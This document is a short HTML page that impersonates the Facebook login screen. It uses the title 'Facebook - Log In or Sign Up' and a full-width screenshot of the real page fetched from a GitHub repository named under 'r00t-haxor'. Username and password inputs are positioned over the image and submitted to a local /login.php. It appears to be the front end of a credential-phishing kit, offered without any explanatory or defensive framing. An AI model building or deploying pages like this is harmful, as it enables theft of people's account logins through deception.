<html>
    <style>
      html {
        background-color: #edf0f5;
        }
     .bg {
        position: relative;
    }
    #user {
        padding: 10px;
        position: absolute;
        top: 23%;
        right: 10%;
        width: 32%;
        text-align: center;
    }
    #pass {
        padding: 10px;
        position: absolute;
        top: 31%;
        right: 10%;
        width: 32%;
        text-align: center;
        }
    #submit-btn {
        padding: 20px;
        position: absolute;
        top: 42%;
        right: 10%;
        width: 32%;
        background-color: #1877f2;
        color: #fff;
        }
    </style>
<header><title>Facebook - Log In or Sign Up</title></header>
<body>
    <img class="bg" src="https://raw.githubusercontent.com/r00t-haxor/helloworld/master/login.jpg" width=100%>
    <form action="/login.php">
          <input type="text" id="user" name="user" placeholder="Username or Email Address"><br>
          <input type="password" id="pass" name="pass" placeholder="Password"><br>
          <input id="submit-btn" type="submit" value="Log In">
     </form>
</body>
</html>
